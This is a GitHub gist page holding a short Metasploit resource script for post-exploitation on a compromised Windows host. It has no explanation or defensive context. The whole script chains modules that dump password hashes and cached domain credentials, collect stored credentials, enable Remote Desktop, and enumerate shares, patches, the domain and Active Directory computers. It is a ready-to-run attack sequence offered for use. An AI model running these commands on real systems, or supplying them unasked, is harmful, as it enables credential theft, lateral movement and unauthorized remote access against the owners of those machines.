Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save Jineeshak/d78af66a3fa8d3564814bb16613dbc51 to your computer and use it in GitHub Desktop.
Save Jineeshak/d78af66a3fa8d3564814bb16613dbc51 to your computer and use it in GitHub Desktop.
Metasploit Post Exploitation Script For Windows
setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
run
use post/windows/gather/enum_shares
run
use post/windows/gather/enum_patches
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/manage/enable_rdp
run
use post/windows/gather/enum_domain
run
use post/windows/gather/credentials/credential_collector
run
use post/windows/gather/enum_computers
run
use post/windows/gather/cachedump
run
use post/windows/gather/enum_ad_computers
run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment